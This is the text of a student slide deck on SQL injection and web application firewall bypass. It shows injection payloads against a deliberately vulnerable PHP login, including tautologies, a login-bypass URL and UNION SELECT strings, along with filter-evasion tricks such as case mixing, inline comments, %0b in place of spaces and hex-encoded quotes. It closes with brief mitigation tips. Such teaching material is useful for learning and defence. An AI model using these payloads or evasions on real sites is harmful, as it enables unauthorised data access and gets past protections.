![Page 1: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/1.jpg)
All Ab0ut 0f SQL Injection and WAF Bypass Techniques
THATSANAI DETDAMRONGPREEECHA
COMPUTER SCIENCE @ KING MONGKUT'S INSTITUTE OF TECHNOLOGY LADKRABANG
![Page 2: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/2.jpg)
What is SQL Injection ?
Sql injection is code injection
Happened when user Inject sql command for change condition
because develop not filtered input from user
![Page 3: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/3.jpg)
Logical Conjunction and Disjunction table
![Page 4: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/4.jpg)
SQL Operator
And , &&
Or , ||
Like
*
( , )
< , >
+, - , *, /, %
![Page 5: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/5.jpg)
SQL Comment
end of the line
"#"
"--"
"-- "
multiple line
/* */
![Page 6: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/6.jpg)
Examples
vulnerability and inject command
![Page 7: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/7.jpg)
sql command :
SELECT first_name, last_name FROM users WHERE user_id = '$id‘
Inject code :
SELECT first_name, last_name FROM users WHERE user_id = '1‘ or ‘1’SELECT first_name, last_name FROM users WHERE user_id = 'am’ or ‘am’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘1’=‘1’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘2600’=‘2600’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘HELLO’ or ‘HELLO’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or 1 #’SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or true #’
![Page 8: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/8.jpg)
sql command :
SELECT first_name, last_name FROM users WHERE user_id = $id
Inject code :
true‘1’ or ‘1’2 or 2
sql command :
SELECT first_name, last_name FROM users WHERE user_id = ($id)
Inject code :
1) or (12+3) or (5
![Page 9: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/9.jpg)
http://cs.ssru.ac.th/cs01/mae/Pae/ตั�วอย่�างและโปรแกรมที่��โหลดๆมา/Login_thaicreate/PHP MySQL ก�บLogin Form ที่�าระบบ User ล�อกอ�น แบบง�าย่ ๆ ด�วย่ PHP และ MySQL โดย่ที่�าการตัรวจสอบ Username และPassword.htm
![Page 10: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/10.jpg)
http://www.santosh143.com/2013/05/how-to-create-loginregister-system.html
![Page 11: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/11.jpg)
http://www.exploit-db.com/exploits/26405/
![Page 12: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/12.jpg)
http://www.exploit-db.com/exploits/26416/
![Page 13: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/13.jpg)
Example
$sql = "SELECT * FROM members WHERE password='".md5($_GET['password'])."' AND username='".$_GET['username']."'";
$result = mysql_query($sql, $db);
if ($result === FALSE)
die('Invalid SQL query');
if (mysql_num_rows($result) == 1) {
echo "Congrats, WIN!!!\n";
}
else {
echo "The number of rows is not 1\n";
}
login_sqli1.php?password=whatever&username='+or+1=1+LIMIT+1#
![Page 14: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/14.jpg)
Impact
Get Information in database
Can gaining access system
Etc.
![Page 15: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/15.jpg)
Bypass Web Application Firewall
Techniques
![Page 16: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/16.jpg)
What is Web Application Firewall
Web application Firewall ( WAF )
Software or Hardware
Emphasis in prevention on the website
Filters all data in application layer
Can detected and prevention website
![Page 17: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/17.jpg)
How to Bypass? Original
1’ or ‘1’=‘1
union all select 1,2,3,4,5 –
union all select 1,2,@@version,4,5 –
Solution 1’ oR ‘1’=‘1
uNIon AlL sELeCt 1,2,3,4,5 –
u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --
![Page 18: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/18.jpg)
How to Bypass? (cont.)
If Filter or , and
Solve : Using || instead of or
Using && instead of and
![Page 19: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/19.jpg)
How to Bypass? (cont.)
If Filter where
Solve : Using limit instead of where
If Filter limit
Solve : You can Using group by and having instead of where
![Page 20: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/20.jpg)
How to Bypass? (cont.)
If Filter whitespace
Solve : Using %0b instead of whitespace
If Filter ‘
Solve : Using 0xXX , unhex(xx) instead of ‘
![Page 21: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/21.jpg)
How to Mitigation
![Page 22: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/22.jpg)
Top 5 Secure Coding Tips for PHP applications
Filter Input Data GET , POST , COOKIE
Securing Database Queries
Filter Output Data htmlspecialchars()
htmlentities()
strip_tags()
strtr()
Error Handling log_errors = On
display_errors = Off
Preventing other injection attacks
![Page 23: All Ab0ut 0f SQL Injection and WAF Bypass Techniques](https://reader034.vdocuments.net/reader034/viewer/2022051214/56813582550346895d9ce03c/html5/thumbnails/23.jpg)
References and Appendix
www.owasp.org
http://palpapers.plynt.com/issues/2009Dec/secure-coding-php/
http://dev.mysql.com/doc/refman/5.0/en/non-typed-operators.html
http://thtutz.blogspot.com